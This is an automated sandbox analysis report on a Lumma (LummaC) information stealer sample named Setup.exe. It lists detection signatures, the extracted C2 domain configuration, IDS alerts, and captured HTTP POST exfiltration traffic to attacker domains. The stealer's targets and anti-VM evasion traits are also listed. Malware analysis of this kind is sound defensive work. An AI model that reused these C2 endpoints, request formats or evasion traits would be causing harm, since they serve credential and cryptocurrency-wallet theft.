Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Setup.exe

Overview

General Information

Sample name:Setup.exe
Analysis ID:1584525
MD5:2fbed9c7f4e671459ba52391d1d2975d
SHA1:89e3ebc3fb946566a77bb1359d0f43eded9ff3a2
SHA256:0f17388ac1220dcb7bcb2889e16bb21fae876045a55079a572057c75fa2d2067
Tags:exeLummaStealeruser-aachum
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected LummaC Stealer
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
LummaC encrypted strings found
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Detected potential crypto function
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains executable resources (Code or Archives)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Searches for user specific document files
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Setup.exe (PID: 6576 cmdline: "C:\Users\user\Desktop\Setup.exe" MD5: 2FBED9C7F4E671459BA52391D1D2975D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["tirepublicerj.shop", "wholersorie.shop", "cloudewahsj.shop", "framekgirus.shop", "rabidcowse.shop", "noisycuttej.shop", "abruptyopsn.shop", "nearycrepso.shop", "displayclubby.sbs"], "Build id": "hRjzG3--GAS"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

      Memory Dumps

      SourceRuleDescriptionAuthorStrings
      00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
      • 0x53d65:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
      Process Memory Space: Setup.exe PID: 6576JoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
        Process Memory Space: Setup.exe PID: 6576JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: Setup.exe PID: 6576JoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
            Process Memory Space: Setup.exe PID: 6576JoeSecurity_LummaCStealerYara detected LummaC StealerJoe Security
              Click to see the 1 entries

              Sigma Signatures

              No Sigma rule has matched

              Suricata Signatures

              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-05T18:58:13.957384+010020283713Unknown Traffic192.168.2.549721104.21.64.1443TCP
              2025-01-05T18:58:15.214340+010020283713Unknown Traffic192.168.2.549722104.21.64.1443TCP
              2025-01-05T18:58:16.373395+010020283713Unknown Traffic192.168.2.549723104.21.64.1443TCP
              2025-01-05T18:58:17.512468+010020283713Unknown Traffic192.168.2.549724104.21.64.1443TCP
              2025-01-05T18:58:18.684917+010020283713Unknown Traffic192.168.2.549725104.21.64.1443TCP
              2025-01-05T18:58:20.350470+010020283713Unknown Traffic192.168.2.549728104.21.64.1443TCP
              2025-01-05T18:58:22.150236+010020283713Unknown Traffic192.168.2.549731104.21.64.1443TCP
              2025-01-05T18:58:23.191474+010020283713Unknown Traffic192.168.2.549742104.21.64.1443TCP
              2025-01-05T18:58:24.491158+010020283713Unknown Traffic192.168.2.549748185.161.251.21443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-05T18:58:14.714158+010020546531A Network Trojan was detected192.168.2.549721104.21.64.1443TCP
              2025-01-05T18:58:15.710485+010020546531A Network Trojan was detected192.168.2.549722104.21.64.1443TCP
              2025-01-05T18:58:23.623861+010020546531A Network Trojan was detected192.168.2.549742104.21.64.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-05T18:58:14.714158+010020498361A Network Trojan was detected192.168.2.549721104.21.64.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-05T18:58:15.710485+010020498121A Network Trojan was detected192.168.2.549722104.21.64.1443TCP
              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
              2025-01-05T18:58:20.812695+010020480941Malware Command and Control Activity Detected192.168.2.549728104.21.64.1443TCP

              Joe Sandbox Signatures

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Antivirus detection for URL or domain
              Source: https://klipvumisui.shop/int_clp_sha.txtpAvira URL Cloud: Label: malware
              Source: https://klipvumisui.shop/int_clp_sha.txtdsAvira URL Cloud: Label: malware
              Source: https://cegu.shop/8574262446/ph.txt1eNIAvira URL Cloud: Label: malware
              Source: https://cegu.shop/QAvira URL Cloud: Label: malware
              Source: https://cegu.shop/8574262446/ph.txtMhNfAvira URL Cloud: Label: malware
              Source: https://cegu.shop/8574262446/ph.txtebKit/537.36Avira URL Cloud: Label: malware
              Source: https://cegu.shop/8574262446/ph.txtlAvira URL Cloud: Label: malware
              Found malware configuration
              Source: Setup.exe.6576.0.memstrminMalware Configuration Extractor: LummaC {"C2 url": ["tirepublicerj.shop", "wholersorie.shop", "cloudewahsj.shop", "framekgirus.shop", "rabidcowse.shop", "noisycuttej.shop", "abruptyopsn.shop", "nearycrepso.shop", "displayclubby.sbs"], "Build id": "hRjzG3--GAS"}
              Multi AV Scanner detection for submitted file
              Source: Setup.exeReversingLabs: Detection: 21%
              Source: Setup.exeVirustotal: Detection: 19%Perma Link
              Sample uses string decryption to hide its real strings
              Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmpString decryptor: cloudewahsj.shop
              Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmpString decryptor: rabidcowse.shop
              Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmpString decryptor: noisycuttej.shop
              Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmpString decryptor: tirepublicerj.shop
              Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmpString decryptor: framekgirus.shop
              Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmpString decryptor: wholersorie.shop
              Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmpString decryptor: abruptyopsn.shop
              Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmpString decryptor: nearycrepso.shop
              Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmpString decryptor: displayclubby.sbs
              Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
              Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
              Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
              Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
              Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmpString decryptor: Workgroup: -
              Source: 00000000.00000002.4467890525.0000000002480000.00000040.00001000.00020000.00000000.sdmpString decryptor: hRjzG3--GAS
              Source: Setup.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49721 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49722 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49723 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49724 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49725 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49728 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 185.161.251.21:443 -> 192.168.2.5:49748 version: TLS 1.2

              Networking

              barindex
              Suricata IDS alerts for network traffic
              Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49721 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49722 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49721 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49722 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49728 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49742 -> 104.21.64.1:443
              C2 URLs / IPs found in malware configuration
              Source: Malware configuration extractorURLs: tirepublicerj.shop
              Source: Malware configuration extractorURLs: wholersorie.shop
              Source: Malware configuration extractorURLs: cloudewahsj.shop
              Source: Malware configuration extractorURLs: framekgirus.shop
              Source: Malware configuration extractorURLs: rabidcowse.shop
              Source: Malware configuration extractorURLs: noisycuttej.shop
              Source: Malware configuration extractorURLs: abruptyopsn.shop
              Source: Malware configuration extractorURLs: nearycrepso.shop
              Source: Malware configuration extractorURLs: displayclubby.sbs
              Source: Joe Sandbox ViewIP Address: 185.161.251.21 185.161.251.21
              Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
              Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
              Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49723 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49731 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49742 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49721 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49725 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49722 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49724 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49728 -> 104.21.64.1:443
              Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49748 -> 185.161.251.21:443
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: displayclubby.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 77Host: displayclubby.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=EH35OOWNHHMNUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12797Host: displayclubby.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=J2C6QZYMBGK69XZRAJUUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15081Host: displayclubby.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=QH87QAR8HUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20511Host: displayclubby.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=V39DKRJ9WNME5J8KZ2User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 976Host: displayclubby.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=DCMRVADM4YO11PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1074Host: displayclubby.sbs
              Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 112Host: displayclubby.sbs
              Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: global trafficHTTP traffic detected: GET /8574262446/ph.txt HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: cegu.shop
              Source: global trafficDNS traffic detected: DNS query: displayclubby.sbs
              Source: global trafficDNS traffic detected: DNS query: cegu.shop
              Source: unknownHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: displayclubby.sbs
              Source: Setup.exe, 00000000.00000003.2185680274.00000000036C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
              Source: Setup.exe, 00000000.00000003.2185680274.00000000036C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
              Source: Setup.exeString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
              Source: Setup.exe, 00000000.00000003.2185680274.00000000036C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
              Source: Setup.exeString found in binary or memory: http://crl.starfieldtech.com/repository/0
              Source: Setup.exeString found in binary or memory: http://crl.starfieldtech.com/repository/sfsroot.crl0P
              Source: Setup.exeString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
              Source: Setup.exe, 00000000.00000003.2185680274.00000000036C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
              Source: Setup.exe, 00000000.00000003.2185680274.00000000036C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
              Source: Setup.exe, 00000000.00000003.2185680274.00000000036C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
              Source: Setup.exe, 00000000.00000003.2185680274.00000000036C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
              Source: Setup.exe, 00000000.00000003.2185680274.00000000036C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
              Source: Setup.exe, 00000000.00000003.2185680274.00000000036C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://ocsp.rootca1.amazontrust.com0:
              Source: Setup.exeString found in binary or memory: http://ocsp.starfieldtech.com/0D
              Source: Setup.exeString found in binary or memory: http://ocsp.thawte.com0
              Source: Setup.exeString found in binary or memory: http://s1.symcb.com/pca3-g5.crl0
              Source: Setup.exeString found in binary or memory: http://s2.symcb.com0
              Source: Setup.exeString found in binary or memory: http://sf.symcb.com/sf.crl0f
              Source: Setup.exeString found in binary or memory: http://sf.symcb.com/sf.crt0
              Source: Setup.exeString found in binary or memory: http://sf.symcd.com0&
              Source: Setup.exeString found in binary or memory: http://sv.symcb.com/sv.crl0W
              Source: Setup.exeString found in binary or memory: http://sv.symcb.com/sv.crt0
              Source: Setup.exeString found in binary or memory: http://sv.symcd.com0&
              Source: Setup.exeString found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
              Source: Setup.exeString found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
              Source: Setup.exeString found in binary or memory: http://ts-ocsp.ws.symantec.com07
              Source: Setup.exeString found in binary or memory: http://www.innosetup.com/
              Source: Setup.exeString found in binary or memory: http://www.remobjects.com/ps
              Source: Setup.exeString found in binary or memory: http://www.symauth.com/cps0(
              Source: Setup.exeString found in binary or memory: http://www.symauth.com/rpa00
              Source: Setup.exe, 00000000.00000003.2185680274.00000000036C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.c.lencr.org/0
              Source: Setup.exe, 00000000.00000003.2185680274.00000000036C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://x1.i.lencr.org/0
              Source: Setup.exe, 00000000.00000003.2162858016.000000000364A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2163006437.0000000003649000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2162927299.0000000003647000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
              Source: Setup.exe, 00000000.00000003.2162858016.000000000364A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2163006437.0000000003649000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2162927299.0000000003647000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
              Source: Setup.exe, 00000000.00000002.4466727451.00000000006F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/
              Source: Setup.exe, 00000000.00000002.4466727451.00000000006F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txt
              Source: Setup.exe, 00000000.00000002.4466727451.00000000006F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txt1eNI
              Source: Setup.exe, 00000000.00000002.4466727451.00000000006F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txtMhNf
              Source: Setup.exe, 00000000.00000002.4468527188.0000000002ABB000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txtebKit/537.36
              Source: Setup.exe, 00000000.00000003.2252229474.000000000073E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4467113114.0000000000739000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/8574262446/ph.txtl
              Source: Setup.exe, 00000000.00000002.4466727451.00000000006F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cegu.shop/Q
              Source: Setup.exe, 00000000.00000003.2162858016.000000000364A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2163006437.0000000003649000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2162927299.0000000003647000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
              Source: Setup.exe, 00000000.00000003.2162858016.000000000364A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2163006437.0000000003649000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2162927299.0000000003647000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
              Source: Setup.exeString found in binary or memory: https://d.symcb.com/cps0%
              Source: Setup.exeString found in binary or memory: https://d.symcb.com/rpa0
              Source: Setup.exe, 00000000.00000002.4466727451.000000000071F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2252229474.0000000000737000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2852575069.000000000071B000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4467113114.0000000000739000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4468769153.0000000003718000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dfgh.online/invoker.php?compName=
              Source: Setup.exe, Setup.exe, 00000000.00000002.4467465356.00000000007A0000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4466727451.00000000006CA000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2219391647.0000000000775000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2151792860.000000000073D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2852643199.000000000079D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2252229474.0000000000775000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2231452822.0000000000793000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2252135064.0000000000793000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2173869381.0000000003687000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2252135064.000000000079E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2174049537.000000000368A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2852643199.000000000078F000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2219391647.000000000079E000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4467113114.0000000000778000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2161734464.0000000000775000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000002.4467465356.0000000000790000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://displayclubby.sbs/
              Source: Setup.exe, 00000000.00000003.2202431157.000000000079A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://displayclubby.sbs/&&8
              Source: Setup.exe, 00000000.00000003.2151792860.000000000073D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://displayclubby.sbs/)
              Source: Setup.exe, 00000000.00000002.4467465356.0000000000790000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2231452822.0000000000736000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://displayclubby.sbs/api
              Source: Setup.exe, 00000000.00000003.2151792860.000000000073D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2161734464.0000000000769000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://displayclubby.sbs/api$
              Source: Setup.exe, 00000000.00000003.2151792860.000000000073D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2161734464.000000000077F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://displayclubby.sbs/api;
              Source: Setup.exe, 00000000.00000003.2151792860.000000000073D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://displayclubby.sbs/apiJg
              Source: Setup.exe, 00000000.00000003.2231452822.0000000000775000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2151792860.000000000073D000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2161734464.0000000000775000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://displayclubby.sbs/q
              Source: Setup.exe, 00000000.00000003.2185440427.0000000003612000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2185774111.0000000003612000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://displayclubby.sbs:443/api
              Source: Setup.exe, 00000000.00000003.2162858016.000000000364A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2162927299.0000000003647000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: Setup.exe, 00000000.00000003.2162858016.000000000364A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2162927299.0000000003647000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: Setup.exe, 00000000.00000003.2162858016.000000000364A000.00000004.00000800.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2162927299.0000000003647000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: Setup.exe, 00000000.00000002.4467423861.0000000000784000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2252135064.0000000000784000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txt
              Source: Setup.exe, 00000000.00000002.4467423861.0000000000784000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2252135064.0000000000784000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtds
              Source: Setup.exe, 00000000.00000002.4467423861.0000000000784000.00000004.00000020.00020000.00000000.sdmp, Setup.exe, 00000000.00000003.2252135064.0000000000784000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://klipvumisui.shop/int_clp_sha.txtp
              Source: Setup.exe, 00000000.00000003.2186564595.000000000393C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: Setup.exe, 00000000.00000003.2186564595.000000000393C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
